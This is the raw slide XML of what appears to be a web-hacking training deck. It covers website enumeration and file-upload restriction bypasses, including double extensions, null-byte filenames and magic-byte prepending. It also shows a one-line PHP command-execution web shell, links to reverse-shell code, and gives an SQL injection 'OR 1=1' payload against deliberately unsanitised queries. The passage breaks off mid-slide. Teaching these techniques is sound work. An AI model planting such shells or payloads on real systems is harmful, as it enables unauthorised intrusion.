              <a:t>Could be from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, or an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uploaded file</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;75;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 Quick Recap</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Google Shape;76;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="154775"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Methodology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Enumerate the website: Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nmap &amp; Gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, look at the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t> source code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, look for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> folder</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Do you need credentials anywhere? How is authentication handled?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Look for something interactive - can you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>submit data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What do requests look like? Is there an API endpoint?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Can you provoke error messages? Can you use default credentials?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File Upload Restrictions</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;82;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="38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Why does this matter?</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Uploading reverse shells</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Provoking errors</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>How can we bypass restrictions?</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Modify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> header (for example, to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Filename tricks</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Extra extensions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.php.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.jpg.php</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Null Bytes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.php%00.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Alternative file extensions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.phtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.jspf</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1100"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="700"/>
              <a:t>(See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="700" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://null-byte.wonderhowto.com/how-to/bypass-file-upload-restrictions-web-apps-get-shell-0323454/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="700"/>
              <a:t> for more!)</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Magic Bytes</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>head -c 20 /path/to/safe_file | xxd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> to see magic bytes (first 4-8)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>head -c 8 /path/to/safe_file &gt; /path/to/shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> to add bytes</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nano /path/to/shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /path/to/existing_shell &gt;&gt; /path/to/shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> to add shell cod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>e</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ile /path/to/shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> to check type</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>List of signatures: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/List_of_file_signatures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Gaining a Web Shell</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;88;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="37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PHP Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/pentestmonkey/php-reverse-shell</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Change the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$port</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Then just load the script by visiting the page!</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>You may have to enumerate the upload location - gobuster can help!</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Sometimes error messages can disclose the webroot path on the server, or you can find it on /phpinfo.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>PHP Arbitrary Code Execution</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>&lt;?php system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET[‘cmd’]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>); ?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/path/to/shell?cmd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arbitrary linux command</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>What about other languages?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Web Shells are available in Python, JSP (Java), Ruby, and pretty much any language you can think of</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/tennc/webshell</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/TheBinitGhimire/Web-Shells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1152475"/>
            <a:ext cx="8520600" cy="39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Example Query Structure</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Login: SELECT * FROM users WHERE username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET[‘username’]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> AND password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET[‘password’]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Comment Search: SELECT name, text, date FROM comments WHERE text LIKE “%” . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET[‘query’]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> . “%”;</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>The Vulnerability:</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>User input is passed directly to the query and treated as SQL code</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>This can cause arbitrary SQL to be executed:</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>SELECT * FROM users WHERE username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“injected” OR 1=1; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND password = “whatever”;</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
